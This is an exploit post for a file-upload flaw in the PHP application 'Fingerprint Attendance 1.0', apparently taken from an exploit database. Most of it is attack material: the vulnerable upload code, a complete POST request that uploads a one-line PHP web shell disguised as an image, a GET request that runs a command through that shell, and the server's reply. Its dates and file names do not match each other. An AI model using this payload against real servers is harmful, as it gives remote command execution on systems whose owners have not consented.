Exploit for Fingerprint Attendance 1.0 Shell Upload

Name: Exploit for Fingerprint Attendance 1.0 Shell Upload
Rating: 5 (160 reviews)
2022-03-29 | CVSS -0.0
## https://sploitus.com/exploit?id=PACKETSTORM:166509
# Title: Fingerprint Attendance 1.0 Shell Upload  
# Author: Hejap Zairy  
# Date: 28.07.2022  
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/  
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy  
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
registered user can bypass waf upload .php.jpg files in attachments section with use of intercept tool in burbsuite to edit the raw  
  
  
#vulnerability Code php  
Needs more filtering to upload NRIC files  
  
```  
<?php  
  
$namae = $_POST["NRIC"]; // this will be nric  
$target_dir = "photo/";  
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);  
$uploadOk = 1;  
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));  
// Check if image file is a actual image or fake image  
if(isset($_POST["submit"])) {  
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);  
if($check !== false) {  
//echo "File is an image - " . $check["mime"] . ".";  
$uploadOk = 1;  
} else {  
// echo "File is not an image.";  
$uploadOk = 0;  
}  
}  
```  
  
  
[+] Payload POST  
  
```  
POST /fingerprint/src/register.php HTTP/1.1  
Host: 0day.gov  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116  
Content-Length: 2446  
Origin: http://0day.gov  
Connection: close  
Referer: http://0day.gov/fingerprint/src/register.php  
Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q  
Upgrade-Insecure-Requests: 1  
  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="fname"  
Admin  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="lname"  
  
admin  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="NRIC"  
Admin  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="emailaddress"  
Admin@gmail.com  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="contact"  
  
admin  
  
-----------------------------3324626841792192532944123116  
  
Content-Disposition: form-data; name="contact2"  
admin  
-----------------------------3324626841792192532944123116  
  
Content-Disposition: form-data; name="line1"  
  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="line2"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="line3"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="city"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="zip"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="country"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="bankName"  
Admin  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="bankDetail"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="job"  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="fileToUpload"; filename="0day_hejap.png.php"  
Content-Type: image/jpg  
  
<?=`$_GET[515]`?>  
  
  
-----------------------------3324626841792192532944123116  
Content-Disposition: form-data; name="button"  
Register  
-----------------------------3324626841792192532944123116--  
```  
  
  
#Status: CRITICAL  
  
[+] Payload GET  
  
```  
GET /fingerprint/src/photo/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1  
  
Host: 0day.gov  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41  
Upgrade-Insecure-Requests: 1  
  
  
```  
  
#Response   
```  
HTTP/1.1 200 OK  
Date: Thu, 29 Mar 2022 11:15:56 GMT  
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27  
X-Powered-By: PHP/7.4.27  
Content-Length: 12  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
Hejap Zairy  
```  
  
  
# Description:  
The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.  
  
  
# Proof and Exploit:  
https://i.imgur.com/A3BlWTF.png